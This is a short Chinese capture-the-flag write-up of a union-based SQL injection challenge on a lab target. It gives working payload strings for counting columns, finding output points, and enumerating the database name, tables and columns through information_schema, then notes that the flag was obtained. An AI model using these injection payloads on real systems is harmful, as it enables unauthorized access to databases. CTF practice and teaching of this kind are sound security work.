攻防世界web进阶区(2)--记一次sql注入

bluet00 2020-02-14

题目地址:http://111.198.29.45:56094

这是一道sql注入题。

攻防世界web进阶区(2)--记一次sql注入

 试试1‘ order by 3#,发现页面显示正常,将3换为4时,页面报错,则说明含有3个字段。

接下来判断输出点,即输入1‘ union select 1,2,3#,发现2与3的位置是输出点。

攻防世界web进阶区(2)--记一次sql注入

 爆数据库名: 1‘ union select 1,database(),3#

攻防世界web进阶区(2)--记一次sql注入

 1‘ union select 1,2,table_name from information_schema.tables where table_schema=‘news‘#查询 news 数据库中的表

攻防世界web进阶区(2)--记一次sql注入

1‘ union select 1,2,column_name from information_schema.columns where table_schema=‘news‘ and table_name=‘secret_table‘#查询列名

攻防世界web进阶区(2)--记一次sql注入

 得flag:

攻防世界web进阶区(2)--记一次sql注入

相关推荐

jiong / 0评论 2020-09-17